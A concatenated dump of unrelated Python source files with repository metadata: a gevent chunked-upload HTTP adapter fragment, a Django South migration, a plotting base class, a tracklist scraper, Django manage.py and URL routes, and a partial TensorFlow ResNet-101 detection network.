conn = conn.proxy_pool
low_conn = conn._get_conn(timeout=timeout)
try:
low_conn.putrequest(request.method,
url,
skip_accept_encoding=True)
for header, value in request.headers.items():
low_conn.putheader(header, value)
low_conn.endheaders()
def send_body():
for i in request.body:
low_conn.send(hex(len(i))[2:].encode('utf-8'))
low_conn.send(b'\r\n')
low_conn.send(i)
low_conn.send(b'\r\n')
#must sleep to make streams LIVE
gevent.sleep(0)
low_conn.send(b'0\r\n\r\n')
gevent.spawn(send_body)
r = low_conn.getresponse()
resp = HTTPResponse.from_httplib(
r,
pool=conn,
connection=low_conn,
preload_content=False,
decode_content=False
)
except:
# If we hit any problems here, clean up the connection.
# Then, reraise so that we can handle the actual exception.
low_conn.close()
raise
else:
# All is well, return the connection to the pool.
conn._put_conn(low_conn)
except socket.error as sockerr:
raise ConnectionError(sockerr, request=request)
except MaxRetryError as e:
raise ConnectionError(e, request=request)
except _ProxyError as e:
raise ProxyError(e)
except (_SSLError, _HTTPError) as e:
if isinstance(e, _SSLError):
raise SSLError(e, request=request)
elif isinstance(e, TimeoutError):
raise Timeout(e, request=request)
else:
raise
return self.build_response(request, resp)
"""
def main():
if len(sys.argv) != 2:
print "Usage: %s " % sys.argv[0]
return 1
headers = { 'Accept-Encoding' : 'identity' }
sess = requests.sessions.Session()
sess.headers.update(headers)
sess.verify = False
sess.prefetch = False
sess.hooks.update(response=response_hook)
resp = sess.get(sys.argv[1])
cb = lambda x: sys.stdout.write("Read: %s\n" % x)
for chunk in resp.iter_chunks():
cb(chunk)
"""
|
[
"zbo@agutong.com"
] |
zbo@agutong.com
|
5e769130e09ec9c853cb962ae512aa792a97cbac
|
21b6a178306cd7293f883a3de7b3c8c2a0bebf8f
|
/socialpakt_site/catalog/migrations/0005_auto__add_field_product_cart_title__add_field_product_call_to_action.py
|
9a221cbc728a660b70e848beecfb966d7449a973
|
[] |
no_license
|
kdoran/socialpaktgithub
|
ec20d13a99da23d228dd1b238668130712984c4b
|
07729e61dc45e4e0136d941698e035deabd3c839
|
HEAD
| 2016-09-07T18:54:27.371106
| 2012-10-31T23:42:09
| 2012-10-31T23:42:09
| 4,531,846
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,081
|
py
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Product.cart_title'
db.add_column('catalog_product', 'cart_title', self.gf('django.db.models.fields.CharField')(default="This week's shirt", max_length=255), keep_default=False)
# Adding field 'Product.call_to_action'
db.add_column('catalog_product', 'call_to_action', self.gf('django.db.models.fields.CharField')(default='', max_length=255), keep_default=False)
def backwards(self, orm):
# Deleting field 'Product.cart_title'
db.delete_column('catalog_product', 'cart_title')
# Deleting field 'Product.call_to_action'
db.delete_column('catalog_product', 'call_to_action')
models = {
'catalog.product': {
'Meta': {'object_name': 'Product'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'artist': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'artist_on_set'", 'to': "orm['partners.Partner']"}),
'benefits': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'benefits_from_set'", 'to': "orm['partners.Partner']"}),
'call_to_action': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255'}),
'cart_title': ('django.db.models.fields.CharField', [], {'default': '"This week\'s shirt"', 'max_length': '255'}),
'date_expires': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'donation_amount': ('django.db.models.fields.FloatField', [], {'default': '6.0'}),
'goal': ('django.db.models.fields.FloatField', [], {'default': '1200.0'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'price': ('django.db.models.fields.FloatField', [], {}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255', 'db_index': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'total_sold': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'catalog.productphoto': {
'Meta': {'object_name': 'ProductPhoto'},
'description': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'photo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Product']"})
},
'catalog.productvariation': {
'Meta': {'object_name': 'ProductVariation'},
'description': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'num_ordered': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Product']"})
},
'partners.partner': {
'Meta': {'object_name': 'Partner'},
'about': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'partner_type': ('django.db.models.fields.CharField', [], {'max_length': '3', 'db_index': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255', 'db_index': 'True'})
}
}
complete_apps = ['catalog']
|
[
"jonloyens@gmail.com"
] |
jonloyens@gmail.com
|
9effecf143f76a28be0210b64b7faccd8b6fe30c
|
a255de3418235f77bc1f381fb015093b054c09d5
|
/src/Object.py
|
49fa50e665f16227d35788d357af8284cb96e49a
|
[] |
no_license
|
returnEdo/plotPorn
|
4878e297029ea2ea75dbe1352434120a88bad139
|
33ccaad0ef74a3391a86f23e2f4813967da549cc
|
refs/heads/master
| 2023-01-12T06:01:58.782662
| 2020-11-18T10:40:38
| 2020-11-18T10:40:38
| 313,704,256
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,267
|
py
|
#! /usr/bin/env python3
import Matrix2
import Vector2
import Camera
import typing
''' The rendering pipeline is something like:
1) update positions and other stuff
2) update all the vertices of the Object.Object
3) update window dimension
4) compute the screen coordinates
5) render the object '''
class Object:
def __init__(self, position: Vector2.Vector2 = Vector2.Vector2()):
self.position: Vector2.Vector2 = position # this is the relative position of the cg
self.color: typing.List[float] = [1.0, 1.0, 1.0] # color of the object
self.movable: bool = True
self.vertices: typing.List[Vector2.Vector2] = []
self.globalVertices: typing.List[Vector2.Vector2] = []
def __str__(self): return "Object"
def render(self, Mcp: Matrix2.Matrix2, # Camera to pixel matrix
Mps: Matrix2.Matrix2, # Pixel to screen matrix
Mcs: Matrix2.Matrix2, # Camera to screen matrix
camPosition: Vector2.Vector2) -> None:
''' Draws on screen the position of an object
globalPosition is a list of Vector2 '''
pass
def updateVertices(self) -> None:
''' Update all the vertices of an object. Has to be used prior to
the computation of the screen coordinates '''
pass
|
[
"fraccaroedo@gmail.com"
] |
fraccaroedo@gmail.com
|
930ac4430e0cc68c97951ad0f248b08823559803
|
d6a40780e5e0f2a1e8f456e2cb70e79c015e6831
|
/TracklistScraper/tracklist.py
|
34efce7b8ea77890825ee03c0d050175c3e12bc7
|
[] |
no_license
|
jennynzhuang/LiveToPlay
|
60efd8a5f3b9a770bb543243312138a4a37c11da
|
22be1ab28b68c39ec069363ef6d4d32b32aab3d6
|
refs/heads/main
| 2023-07-11T06:56:50.797086
| 2021-08-20T09:17:27
| 2021-08-20T09:17:27
| 398,218,684
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,599
|
py
|
from TracklistScraper.scraper import *
import re # for regular expressions
import json
# full title
# title
# music label
# artists
class Tracks:
def __init__(self, track_content):
# set full content
self.full_title = track_content
split = track_content.split(" - ")
artists = split[0].replace('ft.', '&').replace('vs.', '&').split("&")
# set title of song
self.title = split[1].split(" ")[0]
# set label of song
if(len(split[1].split(" ")) > 1):
if(split[1].split(" ")[1].strip() != ""):
self.label = split[1].split(" ")[1].title().strip()
else:
self.label = "NONE"
else:
self.label = "NONE"
# set artists
self.artists = [a.strip() for a in artists]
def search_track_query(self):
if(self.title.strip() == 'ID'):
return ''
# add artist query
query = 'artist:' + ' AND '.join(self.artists)
# add track name
query = query + ' track:' + self.title.replace('\xa0', ' ')
return query
def trackJSON(self):
data = {}
data["title"] = self.title
data["label"] = self.label
data["artists"] = self.artists
return json.dumps(data)
def __repr__(self):
return self.full_title.strip()
# url
# title
# artists
# content
# performance_type
# performance_length
# tracks (list)
# num tracks -- includes IDs (but ids are not in the tracks)
# date
# genres
class Tracklists:
def __init__(self, url):
# use scraper and get html content from url
soup = get_soup(url);
# set attributes
self.url = url
self.title = soup.find("title").get_text()
authors = soup.find_all("meta", {"itemprop": "author"})
authors = authors[1:]
self.artists = [a['content'] for a in authors]
self.content = soup.find("meta", {"property": "og:description"})['content']
content_split = self.content.split(',')
self.performance_type = content_split[0]
self.performance_length = content_split[2]
self.genres = content_split[3:]
self.num_tracks = soup.find("meta", {"itemprop": "numTracks"})['content'];
tracks = soup.find_all("div", attrs={"class": "fontL", "itemprop": "tracks"})
self.tracks = [Tracks(t.get_text()) for t in tracks]
def tracklistJSON(self):
data = {}
data['url'] = self.url
data['title'] = self.title
data['artists'] = self.artists
data['content'] = self.content
data['performance_type'] = self.performance_type
data['length'] = self.performance_length
data['genres'] = self.genres
data['numtracks'] = self.num_tracks
data['tracks'] = [json.loads(track.trackJSON()) for track in self.tracks]
return json.dumps(data, indent=4)
def __repr__(self):
return self.content
|
[
"noreply@github.com"
] |
jennynzhuang.noreply@github.com
|
4b6e23837721840cee9e64560e25ec4ff77634c4
|
57d99d5a02ccb6b43b4b71810e2df991b9d918ae
|
/web_telemoveis/manage.py
|
f4ad78685a130ae05f1335382b90b0a30fac5d16
|
[] |
no_license
|
danny2911pt/web_telemoveis
|
9e53a73cf63a0516592f8d15a4d80e10293d77d0
|
14df9057595a5f3bdf0d020e0da058fde5ef34f2
|
refs/heads/main
| 2023-03-31T06:46:26.019663
| 2021-04-12T18:34:36
| 2021-04-12T18:34:36
| 356,938,869
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 670
|
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'web_telemoveis.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
[
"daniel.rocha@cgi.com"
] |
daniel.rocha@cgi.com
|
c2bcd28ad63365f380d600ef243f2ceea15941f5
|
5f52330247d61e7479c09a9bf28f5b72b26c3e5f
|
/account/urls.py
|
7af3fb2946ba4bc12d8f85649db810618f6c6378
|
[] |
no_license
|
Not-Menezes/academia_project
|
f7bf4def9fc6b56ceada667a069c7d6f7d772df9
|
db548519cd9b6a8dc8c66513381b9dd8966cb74e
|
refs/heads/main
| 2023-01-19T15:07:40.285331
| 2020-12-03T00:55:18
| 2020-12-03T00:55:18
| 312,699,085
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 853
|
py
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.home, name="home"),
path('register/', views.registerPage, name="register"),
path('login/', views.loginPage, name="login"),
path('logout/', views.logoutUser, name="logout"),
path('home/', views.home, name="home"),
path('dashboard_professor/', views.dashboard_professor, name="dashboard_professor"),
path('dashboard_student/', views.dashboard_student, name="dashboard_student"),
path('create_class/', views.create_class, name='create_class'),
path('add_class/<str:pk>/', views.add_class, name='add_class'),
path('remove_class/<str:pk>/', views.remove_class, name='remove_class'),
path('update_class/<str:pk>/', views.update_class, name='update_class'),
path('delete_class/<str:pk>/', views.delete_class, name="delete_class"),
]
|
[
"newton.coelho@bigdatacorp.com.br"
] |
newton.coelho@bigdatacorp.com.br
|
f39e391d33f69bc01d7114aa04a5836a8245fe29
|
9422e86e84f0726e956fd8942736564088394506
|
/lib/networks/Resnet101_train.py
|
92b6b748de5a13618db8a6a8e69c0c87e86e0260
|
[
"MIT"
] |
permissive
|
joyeuxni/MIFNet
|
8a090be7fdc375b2129a21c0559ef5511bb1f609
|
3b1e1f56d549bb2d105e9782c2b327b2f7d7d089
|
refs/heads/master
| 2020-12-01T03:16:45.921041
| 2020-10-19T09:31:22
| 2020-10-19T09:31:22
| 230,546,982
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 24,311
|
py
|
import tensorflow as tf
from networks.network import Network
import pdb
from ..fast_rcnn.config import cfg
n_classes = 21
_feat_stride = [16,]
anchor_scales = [2,4,8,16,32]
class ResNet101_train(Network):
def __init__(self, trainable=True):
self.inputs = []
self.data = tf.placeholder(tf.float32, shape=[None, None, None, 3], name='data')
self.im_info = tf.placeholder(tf.float32, shape=[None, 3], name='im_info')
self.gt_boxes = tf.placeholder(tf.float32, shape=[None, 5], name='gt_boxes')
self.gt_ishard = tf.placeholder(tf.int32, shape=[None], name='gt_ishard')
self.dontcare_areas = tf.placeholder(tf.float32, shape=[None, 4], name='dontcare_areas')
#self.scene = tf.placeholder(tf.float32, shape=[1,205])
self.keep_prob = tf.placeholder(tf.float32)
self.layers = dict({'data':self.data, 'im_info':self.im_info, 'gt_boxes':self.gt_boxes,\
'gt_ishard': self.gt_ishard, 'dontcare_areas': self.dontcare_areas})
self.trainable = trainable
self.setup()
def setup(self):
n_classes = cfg.NCLASSES
# anchor_scales = [8, 16, 32]
anchor_scales = [2,4,8,16,32]
_feat_stride = [16, ]
(self.feed('data')
.conv(7, 7, 64, 2, 2, biased=False, relu=False, name='conv1')
.batch_normalization(relu=True, name='bn_conv1', is_training=False)
.max_pool(3, 3, 2, 2, padding='VALID',name='pool1')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res2a_branch1')
.batch_normalization(name='bn2a_branch1',is_training=False,relu=False))
(self.feed('pool1')
.conv(1, 1, 64, 1, 1, biased=False, relu=False, name='res2a_branch2a')
.batch_normalization(relu=True, name='bn2a_branch2a',is_training=False)
.conv(3, 3, 64, 1, 1, biased=False, relu=False, name='res2a_branch2b')
.batch_normalization(relu=True, name='bn2a_branch2b',is_training=False)
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res2a_branch2c')
.batch_normalization(name='bn2a_branch2c',is_training=False,relu=False))
(self.feed('bn2a_branch1',
'bn2a_branch2c')
.add(name='res2a')
.relu(name='res2a_relu')
.conv(1, 1, 64, 1, 1, biased=False, relu=False, name='res2b_branch2a')
.batch_normalization(relu=True, name='bn2b_branch2a',is_training=False)
.conv(3, 3, 64, 1, 1, biased=False, relu=False, name='res2b_branch2b')
.batch_normalization(relu=True, name='bn2b_branch2b',is_training=False)
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res2b_branch2c')
.batch_normalization(name='bn2b_branch2c',is_training=False,relu=False))
(self.feed('res2a_relu',
'bn2b_branch2c')
.add(name='res2b')
.relu(name='res2b_relu')
.conv(1, 1, 64, 1, 1, biased=False, relu=False, name='res2c_branch2a')
.batch_normalization(relu=True, name='bn2c_branch2a',is_training=False)
.conv(3, 3, 64, 1, 1, biased=False, relu=False, name='res2c_branch2b')
.batch_normalization(relu=True, name='bn2c_branch2b',is_training=False)
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res2c_branch2c')
.batch_normalization(name='bn2c_branch2c',is_training=False,relu=False))
(self.feed('res2b_relu',
'bn2c_branch2c')
.add(name='res2c')
.relu(name='res2c_relu')
.conv(1, 1, 512, 2, 2, biased=False, relu=False, name='res3a_branch1',padding='VALID')
.batch_normalization(name='bn3a_branch1',is_training=False,relu=False))
(self.feed('res2c_relu')
.conv(1, 1, 128, 2, 2, biased=False, relu=False, name='res3a_branch2a',padding='VALID')
.batch_normalization(relu=True, name='bn3a_branch2a',is_training=False)
.conv(3, 3, 128, 1, 1, biased=False, relu=False, name='res3a_branch2b')
.batch_normalization(relu=True, name='bn3a_branch2b',is_training=False)
.conv(1, 1, 512, 1, 1, biased=False, relu=False, name='res3a_branch2c')
.batch_normalization(name='bn3a_branch2c',is_training=False,relu=False))
(self.feed('bn3a_branch1',
'bn3a_branch2c')
.add(name='res3a')
.relu(name='res3a_relu')
.conv(1, 1, 128, 1, 1, biased=False, relu=False, name='res3b1_branch2a')
.batch_normalization(relu=True, name='bn3b1_branch2a',is_training=False)
.conv(3, 3, 128, 1, 1, biased=False, relu=False, name='res3b1_branch2b')
.batch_normalization(relu=True, name='bn3b1_branch2b',is_training=False)
.conv(1, 1, 512, 1, 1, biased=False, relu=False, name='res3b1_branch2c')
.batch_normalization(name='bn3b1_branch2c',is_training=False,relu=False))
(self.feed('res3a_relu',
'bn3b1_branch2c')
.add(name='res3b1')
.relu(name='res3b1_relu')
.conv(1, 1, 128, 1, 1, biased=False, relu=False, name='res3b2_branch2a')
.batch_normalization(relu=True, name='bn3b2_branch2a',is_training=False)
.conv(3, 3, 128, 1, 1, biased=False, relu=False, name='res3b2_branch2b')
.batch_normalization(relu=True, name='bn3b2_branch2b',is_training=False)
.conv(1, 1, 512, 1, 1, biased=False, relu=False, name='res3b2_branch2c')
.batch_normalization(name='bn3b2_branch2c',is_training=False,relu=False))
(self.feed('res3b1_relu',
'bn3b2_branch2c')
.add(name='res3b2')
.relu(name='res3b2_relu')
.conv(1, 1, 128, 1, 1, biased=False, relu=False, name='res3b3_branch2a')
.batch_normalization(relu=True, name='bn3b3_branch2a',is_training=False)
.conv(3, 3, 128, 1, 1, biased=False, relu=False, name='res3b3_branch2b')
.batch_normalization(relu=True, name='bn3b3_branch2b',is_training=False)
.conv(1, 1, 512, 1, 1, biased=False, relu=False, name='res3b3_branch2c')
.batch_normalization(name='bn3b3_branch2c',is_training=False,relu=False))
(self.feed('res3b2_relu',
'bn3b3_branch2c')
.add(name='res3b3')
.relu(name='res3b3_relu')
.conv(1, 1, 1024, 2, 2, biased=False, relu=False, name='res4a_branch1',padding='VALID')
.batch_normalization(name='bn4a_branch1',is_training=False,relu=False))
(self.feed('res3b3_relu')
.conv(1, 1, 256, 2, 2, biased=False, relu=False, name='res4a_branch2a',padding='VALID')
.batch_normalization(relu=True, name='bn4a_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4a_branch2b')
.batch_normalization(relu=True, name='bn4a_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4a_branch2c')
.batch_normalization(name='bn4a_branch2c',is_training=False,relu=False))
(self.feed('bn4a_branch1',
'bn4a_branch2c')
.add(name='res4a')
.relu(name='res4a_relu')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b1_branch2a')
.batch_normalization(relu=True, name='bn4b1_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b1_branch2b')
.batch_normalization(relu=True, name='bn4b1_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b1_branch2c')
.batch_normalization(name='bn4b1_branch2c',is_training=False,relu=False))
(self.feed('res4a_relu',
'bn4b1_branch2c')
.add(name='res4b1')
.relu(name='res4b1_relu')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b2_branch2a')
.batch_normalization(relu=True, name='bn4b2_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b2_branch2b')
.batch_normalization(relu=True, name='bn4b2_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b2_branch2c')
.batch_normalization(name='bn4b2_branch2c',is_training=False,relu=False))
(self.feed('res4b1_relu',
'bn4b2_branch2c')
.add(name='res4b2')
.relu(name='res4b2_relu')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b3_branch2a')
.batch_normalization(relu=True, name='bn4b3_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b3_branch2b')
.batch_normalization(relu=True, name='bn4b3_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b3_branch2c')
.batch_normalization(name='bn4b3_branch2c',is_training=False,relu=False))
(self.feed('res4b2_relu',
'bn4b3_branch2c')
.add(name='res4b3')
.relu(name='res4b3_relu')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b4_branch2a')
.batch_normalization(relu=True, name='bn4b4_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b4_branch2b')
.batch_normalization(relu=True, name='bn4b4_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b4_branch2c')
.batch_normalization(name='bn4b4_branch2c',is_training=False,relu=False))
(self.feed('res4b3_relu',
'bn4b4_branch2c')
.add(name='res4b4')
.relu(name='res4b4_relu')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b5_branch2a')
.batch_normalization(relu=True, name='bn4b5_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b5_branch2b')
.batch_normalization(relu=True, name='bn4b5_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b5_branch2c')
.batch_normalization(name='bn4b5_branch2c',is_training=False,relu=False))
(self.feed('res4b4_relu',
'bn4b5_branch2c')
.add(name='res4b5')
.relu(name='res4b5_relu')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b6_branch2a')
.batch_normalization(relu=True, name='bn4b6_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b6_branch2b')
.batch_normalization(relu=True, name='bn4b6_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b6_branch2c')
.batch_normalization(name='bn4b6_branch2c',is_training=False,relu=False))
(self.feed('res4b5_relu',
'bn4b6_branch2c')
.add(name='res4b6')
.relu(name='res4b6_relu')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b7_branch2a')
.batch_normalization(relu=True, name='bn4b7_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b7_branch2b')
.batch_normalization(relu=True, name='bn4b7_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b7_branch2c')
.batch_normalization(name='bn4b7_branch2c',is_training=False,relu=False))
(self.feed('res4b6_relu',
'bn4b7_branch2c')
.add(name='res4b7')
.relu(name='res4b7_relu')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b8_branch2a')
.batch_normalization(relu=True, name='bn4b8_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b8_branch2b')
.batch_normalization(relu=True, name='bn4b8_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b8_branch2c')
.batch_normalization(name='bn4b8_branch2c',is_training=False,relu=False))
(self.feed('res4b7_relu',
'bn4b8_branch2c')
.add(name='res4b8')
.relu(name='res4b8_relu')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b9_branch2a')
.batch_normalization(relu=True, name='bn4b9_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b9_branch2b')
.batch_normalization(relu=True, name='bn4b9_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b9_branch2c')
.batch_normalization(name='bn4b9_branch2c',is_training=False,relu=False))
(self.feed('res4b8_relu',
'bn4b9_branch2c')
.add(name='res4b9')
.relu(name='res4b9_relu')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b10_branch2a')
.batch_normalization(relu=True, name='bn4b10_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b10_branch2b')
.batch_normalization(relu=True, name='bn4b10_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b10_branch2c')
.batch_normalization(name='bn4b10_branch2c',is_training=False,relu=False))
(self.feed('res4b9_relu',
'bn4b10_branch2c')
.add(name='res4b10')
.relu(name='res4b10_relu')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b11_branch2a')
.batch_normalization(relu=True, name='bn4b11_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b11_branch2b')
.batch_normalization(relu=True, name='bn4b11_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b11_branch2c')
.batch_normalization(name='bn4b11_branch2c',is_training=False,relu=False))
(self.feed('res4b10_relu',
'bn4b11_branch2c')
.add(name='res4b11')
.relu(name='res4b11_relu')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b12_branch2a')
.batch_normalization(relu=True, name='bn4b12_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b12_branch2b')
.batch_normalization(relu=True, name='bn4b12_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b12_branch2c')
.batch_normalization(name='bn4b12_branch2c',is_training=False,relu=False))
(self.feed('res4b11_relu',
'bn4b12_branch2c')
.add(name='res4b12')
.relu(name='res4b12_relu')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b13_branch2a')
.batch_normalization(relu=True, name='bn4b13_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b13_branch2b')
.batch_normalization(relu=True, name='bn4b13_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b13_branch2c')
.batch_normalization(name='bn4b13_branch2c',is_training=False,relu=False))
(self.feed('res4b12_relu',
'bn4b13_branch2c')
.add(name='res4b13')
.relu(name='res4b13_relu')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b14_branch2a')
.batch_normalization(relu=True, name='bn4b14_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b14_branch2b')
.batch_normalization(relu=True, name='bn4b14_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b14_branch2c')
.batch_normalization(name='bn4b14_branch2c',is_training=False,relu=False))
(self.feed('res4b13_relu',
'bn4b14_branch2c')
.add(name='res4b14')
.relu(name='res4b14_relu')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b15_branch2a')
.batch_normalization(relu=True, name='bn4b15_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b15_branch2b')
.batch_normalization(relu=True, name='bn4b15_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b15_branch2c')
.batch_normalization(name='bn4b15_branch2c',is_training=False,relu=False))
(self.feed('res4b14_relu',
'bn4b15_branch2c')
.add(name='res4b15')
.relu(name='res4b15_relu')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b16_branch2a')
.batch_normalization(relu=True, name='bn4b16_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b16_branch2b')
.batch_normalization(relu=True, name='bn4b16_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b16_branch2c')
.batch_normalization(name='bn4b16_branch2c',is_training=False,relu=False))
(self.feed('res4b15_relu',
'bn4b16_branch2c')
.add(name='res4b16')
.relu(name='res4b16_relu')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b17_branch2a')
.batch_normalization(relu=True, name='bn4b17_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b17_branch2b')
.batch_normalization(relu=True, name='bn4b17_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b17_branch2c')
.batch_normalization(name='bn4b17_branch2c',is_training=False,relu=False))
(self.feed('res4b16_relu',
'bn4b17_branch2c')
.add(name='res4b17')
.relu(name='res4b17_relu')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b18_branch2a')
.batch_normalization(relu=True, name='bn4b18_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b18_branch2b')
.batch_normalization(relu=True, name='bn4b18_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b18_branch2c')
.batch_normalization(name='bn4b18_branch2c',is_training=False,relu=False))
(self.feed('res4b17_relu',
'bn4b18_branch2c')
.add(name='res4b18')
.relu(name='res4b18_relu')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b19_branch2a')
.batch_normalization(relu=True, name='bn4b19_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b19_branch2b')
.batch_normalization(relu=True, name='bn4b19_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b19_branch2c')
.batch_normalization(name='bn4b19_branch2c',is_training=False,relu=False))
(self.feed('res4b18_relu',
'bn4b19_branch2c')
.add(name='res4b19')
.relu(name='res4b19_relu')
.conv(1, 1, 256, 1, 1, biased=False, relu=False, name='res4b20_branch2a')
.batch_normalization(relu=True, name='bn4b20_branch2a',is_training=False)
.conv(3, 3, 256, 1, 1, biased=False, relu=False, name='res4b20_branch2b')
.batch_normalization(relu=True, name='bn4b20_branch2b',is_training=False)
.conv(1, 1, 1024, 1, 1, biased=False, relu=False, name='res4b20_branch2c')
.batch_normalization(name='bn4b20_branch2c',is_training=False,relu=False))
(self.feed('res4b19_relu',
'bn4b20_branch2c')
.add(name='res4b20')
.relu(name='res4b20_relu')
